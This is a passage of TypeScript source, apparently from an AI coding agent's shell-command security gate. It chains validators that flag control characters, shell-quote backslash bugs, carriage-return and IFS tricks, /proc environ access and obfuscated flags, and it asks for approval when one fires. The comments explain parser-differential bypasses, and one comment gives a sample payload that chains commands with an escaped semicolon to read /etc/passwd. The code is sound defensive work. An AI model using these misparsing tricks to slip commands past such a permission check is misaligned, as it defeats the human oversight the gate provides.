'Command contains non-printable control characters that could be used to bypass security checks',
|
|
isBashSecurityCheckForMisparsing: true,
|
|
}
|
|
}
|
|
|
|
// SECURITY: Detect '\' patterns that exploit shell-quote's incorrect handling
|
|
// of backslashes inside single quotes. Must run before shell-quote parsing.
|
|
if (hasShellQuoteSingleQuoteBug(command)) {
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains single-quoted backslash pattern that could bypass security checks',
|
|
isBashSecurityCheckForMisparsing: true,
|
|
}
|
|
}
|
|
|
|
// SECURITY: Strip heredoc bodies before running security validators.
|
|
// Only strip bodies for quoted/escaped delimiters (<<'EOF', <<\EOF) where
|
|
// the body is literal text — $(), backticks, and ${} are NOT expanded.
|
|
// Unquoted heredocs (<<EOF) undergo full shell expansion, so their bodies
|
|
// may contain executable command substitutions that validators must see.
|
|
// When extractHeredocs bails out (can't parse safely), the raw command
|
|
// goes through all validators — which is the safe direction.
|
|
const { processedCommand } = extractHeredocs(command, { quotedOnly: true })
|
|
|
|
const baseCommand = command.split(' ')[0] || ''
|
|
const { withDoubleQuotes, fullyUnquoted, unquotedKeepQuoteChars } =
|
|
extractQuotedContent(processedCommand, baseCommand === 'jq')
|
|
|
|
const context: ValidationContext = {
|
|
originalCommand: command,
|
|
baseCommand,
|
|
unquotedContent: withDoubleQuotes,
|
|
fullyUnquotedContent: stripSafeRedirections(fullyUnquoted),
|
|
fullyUnquotedPreStrip: fullyUnquoted,
|
|
unquotedKeepQuoteChars,
|
|
}
|
|
|
|
const earlyValidators = [
|
|
validateEmpty,
|
|
validateIncompleteCommands,
|
|
validateSafeCommandSubstitution,
|
|
validateGitCommit,
|
|
]
|
|
|
|
for (const validator of earlyValidators) {
|
|
const result = validator(context)
|
|
if (result.behavior === 'allow') {
|
|
return {
|
|
behavior: 'passthrough',
|
|
message:
|
|
result.decisionReason?.type === 'other' ||
|
|
result.decisionReason?.type === 'safetyCheck'
|
|
? result.decisionReason.reason
|
|
: 'Command allowed',
|
|
}
|
|
}
|
|
if (result.behavior !== 'passthrough') {
|
|
return result.behavior === 'ask'
|
|
? { ...result, isBashSecurityCheckForMisparsing: true as const }
|
|
: result
|
|
}
|
|
}
|
|
|
|
// Validators that don't set isBashSecurityCheckForMisparsing — their ask
|
|
// results go through the standard permission flow rather than being blocked
|
|
// early. LF newlines and redirections are normal patterns that splitCommand
|
|
// handles correctly, not misparsing concerns.
|
|
//
|
|
// NOTE: validateCarriageReturn is NOT here — CR IS a misparsing concern.
|
|
// shell-quote's `[^\s]` treats CR as a word separator (JS `\s` ⊃ \r), but
|
|
// bash IFS does NOT include CR. splitCommand collapses CR→space, which IS
|
|
// misparsing. See validateCarriageReturn for the full attack trace.
|
|
const nonMisparsingValidators = new Set([
|
|
validateNewlines,
|
|
validateRedirections,
|
|
])
|
|
|
|
const validators = [
|
|
validateJqCommand,
|
|
validateObfuscatedFlags,
|
|
validateShellMetacharacters,
|
|
validateDangerousVariables,
|
|
// Run comment-quote-desync BEFORE validateNewlines: it detects cases where
|
|
// the quote tracker would miss newlines due to # comment desync.
|
|
validateCommentQuoteDesync,
|
|
// Run quoted-newline BEFORE validateNewlines: it detects the INVERSE case
|
|
// (newlines INSIDE quotes, which validateNewlines ignores by design). Quoted
|
|
// newlines let attackers split commands across lines so that line-based
|
|
// processing (stripCommentLines) drops sensitive content.
|
|
validateQuotedNewline,
|
|
// CR check runs BEFORE validateNewlines — CR is a MISPARSING concern
|
|
// (shell-quote/bash tokenization differential), LF is not.
|
|
validateCarriageReturn,
|
|
validateNewlines,
|
|
validateIFSInjection,
|
|
validateProcEnvironAccess,
|
|
validateDangerousPatterns,
|
|
validateRedirections,
|
|
validateBackslashEscapedWhitespace,
|
|
validateBackslashEscapedOperators,
|
|
validateUnicodeWhitespace,
|
|
validateMidWordHash,
|
|
validateBraceExpansion,
|
|
validateZshDangerousCommands,
|
|
// Run malformed token check last - other validators should catch specific patterns first
|
|
// (e.g., $() substitution, backticks, etc.) since they have more precise error messages
|
|
validateMalformedTokenInjection,
|
|
]
|
|
|
|
// SECURITY: We must NOT short-circuit when a non-misparsing validator
|
|
// returns 'ask' if there are still misparsing validators later in the list.
|
|
// Non-misparsing ask results are discarded at bashPermissions.ts:~1301-1303
|
|
// (the gate only blocks when isBashSecurityCheckForMisparsing is set). If
|
|
// validateRedirections (index 10, non-misparsing) fires first on `>`, it
|
|
// returns ask-without-flag — but validateBackslashEscapedOperators (index 12,
|
|
// misparsing) would have caught `\;` WITH the flag. Short-circuiting lets a
|
|
// payload like `cat safe.txt \; echo /etc/passwd > ./out` slip through.
|
|
//
|
|
// Fix: defer non-misparsing ask results. Continue running validators; if any
|
|
// misparsing validator fires, return THAT (with the flag). Only if we reach
|
|
// the end without a misparsing ask, return the deferred non-misparsing ask.
|
|
let deferredNonMisparsingResult: PermissionResult | null = null
|
|
for (const validator of validators) {
|
|
const result = validator(context)
|
|
if (result.behavior === 'ask') {
|
|
if (nonMisparsingValidators.has(validator)) {
|
|
if (deferredNonMisparsingResult === null) {
|
|
deferredNonMisparsingResult = result
|
|
}
|
|
continue
|
|
}
|
|
return { ...result, isBashSecurityCheckForMisparsing: true as const }
|
|
}
|
|
}
|
|
if (deferredNonMisparsingResult !== null) {
|
|
return deferredNonMisparsingResult
|
|
}
|
|
|
|
return {
|
|
behavior: 'passthrough',
|
|
message: 'Command passed all security checks',
|
|
}
|
|
}
|
|
|
|
/**
|
|
* @deprecated Legacy regex/shell-quote path. Only used when tree-sitter is
|
|
* unavailable. The primary gate is parseForSecurity (ast.ts).
|
|
*
|
|
* Async version of bashCommandIsSafe that uses tree-sitter when available
|
|
* for more accurate parsing. Falls back to the sync regex version when
|
|
* tree-sitter is not available.
|
|
*
|
|
* This should be used by async callers (bashPermissions.ts, bashCommandHelpers.ts).
|
|
* Sync callers (readOnlyValidation.ts) should continue using bashCommandIsSafe().
|
|
*/
|
|
export async function bashCommandIsSafeAsync_DEPRECATED(
|
|
command: string,
|
|
onDivergence?: () => void,
|
|
): Promise<PermissionResult> {
|
|
// Try to get tree-sitter analysis
|
|
const parsed = await ParsedCommand.parse(command)
|
|
const tsAnalysis = parsed?.getTreeSitterAnalysis() ?? null
|
|
|
|
// If no tree-sitter, fall back to sync version
|
|
if (!tsAnalysis) {
|
|
return bashCommandIsSafe_DEPRECATED(command)
|
|
}
|
|
|
|
// Run the same security checks but with tree-sitter enriched context.
|
|
// The early checks (control chars, shell-quote bug) don't benefit from
|
|
// tree-sitter, so we run them identically.
|
|
if (CONTROL_CHAR_RE.test(command)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.CONTROL_CHARACTERS,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains non-printable control characters that could be used to bypass security checks',
|
|
isBashSecurityCheckForMisparsing: true,
|
|
}
|
|
}
|
|
|
|
if (hasShellQuoteSingleQuoteBug(command)) {
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains single-quoted backslash pattern that could bypass security checks',
|
|
isBashSecurityCheckForMisparsing: true,
|
|
}
|
|
}
|
|
|
|
const { processedCommand } = extractHeredocs(command, { quotedOnly: true })
|
|
|
|
const baseCommand = command.split(' ')[0] || ''
|
|
|
|
// Use tree-sitter quote context for more accurate analysis
|
|
const tsQuote = tsAnalysis.quoteContext
|
|
const regexQuote = extractQuotedContent(
|
|
processedCommand,
|
|
baseCommand === 'jq',
|
|
)
|
|
|
|
// Use tree-sitter quote context as primary, but keep regex as reference
|
|
// for divergence logging
|
|
const withDoubleQuotes = tsQuote.withDoubleQuotes
|
|
const fullyUnquoted = tsQuote.fullyUnquoted
|
|
const unquotedKeepQuoteChars = tsQuote.unquotedKeepQuoteChars
|
|
|
|
const context: ValidationContext = {
|
|
originalCommand: command,
|
|
baseCommand,
|
|
unquotedContent: withDoubleQuotes,
|
|
fullyUnquotedContent: stripSafeRedirections(fullyUnquoted),
|
|
fullyUnquotedPreStrip: fullyUnquoted,
|
|
unquotedKeepQuoteChars,
|
|
treeSitter: tsAnalysis,
|
|
}
|
|
|
|
// Log divergence between tree-sitter and regex quote extraction.
|
|
// Skip for heredoc commands: tree-sitter strips (quoted) heredoc bodies
|
|
// to nothing while the regex path replaces them with placeholder strings
|
|
// (via extractHeredocs), so the two outputs can never match. Logging
|
|
// divergence for every heredoc command would poison the signal.
|
|
//
|
|
// onDivergence callback: when called in a fanout loop (bashPermissions.ts
|
|
// Promise.all over subcommands), the caller batches divergences into a
|
|
// single logEvent instead of N separate calls. Each logEvent triggers
|
|
// getEventMetadata() → buildProcessMetrics() → process.memoryUsage() →
|
|
// /proc/self/stat read; with memoized metadata these resolve as microtasks
|
|
// and starve the event loop (CC-643). Single-command callers omit the
|
|
// callback and get the original per-call logEvent behavior.
|
|
if (!tsAnalysis.dangerousPatterns.hasHeredoc) {
|
|
const hasDivergence =
|
|
tsQuote.fullyUnquoted !== regexQuote.fullyUnquoted ||
|
|
tsQuote.withDoubleQuotes !== regexQuote.withDoubleQuotes
|
|
if (hasDivergence) {
|
|
if (onDivergence) {
|
|
onDivergence()
|
|
} else {
|
|
logEvent('tengu_tree_sitter_security_divergence', {
|
|
quoteContextDivergence: true,
|
|
})
|
|
}
|
|
}
|
|
}
|
|
|
|
const earlyValidators = [
|
|
validateEmpty,
|
|
validateIncompleteCommands,
|
|
validateSafeCommandSubstitution,
|
|
validateGitCommit,
|
|
]
|
|
|
|
for (const validator of earlyValidators) {
|
|
const result = validator(context)
|
|
if (result.behavior === 'allow') {
|
|
return {
|
|
behavior: 'passthrough',
|
|
message:
|
|
result.decisionReason?.type === 'other' ||
|
|
result.decisionReason?.type === 'safetyCheck'
|
|
? result.decisionReason.reason
|
|
: 'Command allowed',
|
|
}
|
|
}
|
|
if (result.behavior !== 'passthrough') {
|
|
return result.behavior === 'ask'
|
|
? { ...result, isBashSecurityCheckForMisparsing: true as const }
|
|
: result
|
|
}
|
|
}
|
|
|
|
const nonMisparsingValidators = new Set([
|
|
validateNewlines,
|
|
validateRedirections,
|
|
])
|
|
|
|
const validators = [
|
|
validateJqCommand,
|
|
validateObfuscatedFlags,
|
|
validateShellMetacharacters,
|
|
validateDangerousVariables,
|
|
validateCommentQuoteDesync,
|
|
validateQuotedNewline,
|
|
validateCarriageReturn,
|
|
validateNewlines,
|
|
validateIFSInjection,
|
|
validateProcEnvironAccess,
|
|
validateDangerousPatterns,
|
|
validateRedirections,
|
|
validateBackslashEscapedWhitespace,
|
|
validateBackslashEscapedOperators,
|
|
validateUnicodeWhitespace,
|
|
validateMidWordHash,
|
|
validateBraceExpansion,
|
|
validateZshDangerousCommands,
|
|
validateMalformedTokenInjection,
|
|
]
|
|
|
|
let deferredNonMisparsingResult: PermissionResult | null = null
|
|
for (const validator of validators) {
|
|
const result = validator(context)
|
|
if (result.behavior === 'ask') {
|
|
if (nonMisparsingValidators.has(validator)) {
|
|
if (deferredNonMisparsingResult === null) {
|
|
deferredNonMisparsingResult = result
|
|
}
|
|
continue
|
|
}
|
|
return { ...result, isBashSecurityCheckForMisparsing: true as const }
|
|
}
|
|
}
|
|
if (deferredNonMisparsingResult !== null) {
|
|
return deferredNonMisparsingResult
|
|
}
|
|
|
|
return {
|
|
behavior: 'passthrough',
|
|
message: 'Command passed all security checks',
|
|
}
|
|
}
|